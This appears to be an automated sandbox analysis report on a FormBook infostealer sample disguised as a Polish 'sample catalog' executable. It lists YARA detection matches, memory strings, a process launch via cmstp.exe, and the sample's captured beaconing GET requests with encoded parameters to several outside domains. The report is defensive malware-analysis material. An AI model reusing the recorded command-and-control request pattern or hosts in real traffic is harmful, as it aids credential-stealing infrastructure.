          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 10:48:29 GMTServer: Apache/2.4.10 (Debian)Content-Length: 285Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 6c 6c 65 73 2d 61 62 67 65 64 65 63 6b 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.alles-abgedeckt.com Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 10:50:03 GMTContent-Type: text/html; charset=utf-8Content-Length: 2963Connection: closex-wix-request-id: 1636023003.449130355506120675Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjVnh5Kklh0tOjeXRNYui2I,qquldgcFrj2n046g4RNSVOc9uRR3b9ESRFQmutE6otVYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalt5/ToY82z3f1Iadd1mDV+wfoIgWdv1pdEYpwcIu9suB3fKEXQvQlSAkB/lstal9R17zYLyYyrK+fg616qIKE8c=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,2+8df7/86SpxIBpm+VHpf+i/fkkIKkD/fZgnosx7etd9pAiCxHhredE3m8SaSeMp,l7Ey5khejq81S7sxGe5NkxC4MYanLpg+PuBnb2R7HRGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9y9YchCOVZDNGbMpBN9NeuuXxLvkVaG5VQb5mydxWWiYfoPtReGns7o6BqA+77AHvGQ2Otd3B2C27oTTIAKJtQ==Vary: Accept-EncodingX-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f Data Ascii: <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robo
          Source: cmstp.exe, 0000000B.00000002.620985574.0000000004CD2000.00000004.00020000.sdmpString found in binary or memory: http://browsehappy.com/
          Source: nowy przyk#U0142adowy katalog.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: nowy przyk#U0142adowy katalog.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.worryterrible.space
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1Host: www.worryterrible.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.americanvisionvinyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1Host: www.iccsukltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.harada-insatsu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.affiliatemarketingproducts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.bezhantrading.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1Host: www.alles-abgedeckt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.leads-mania.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1Host: www.tankomixing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: nowy przyk#U0142adowy katalog.exe, 00000000.00000002.362117708.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FF1

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
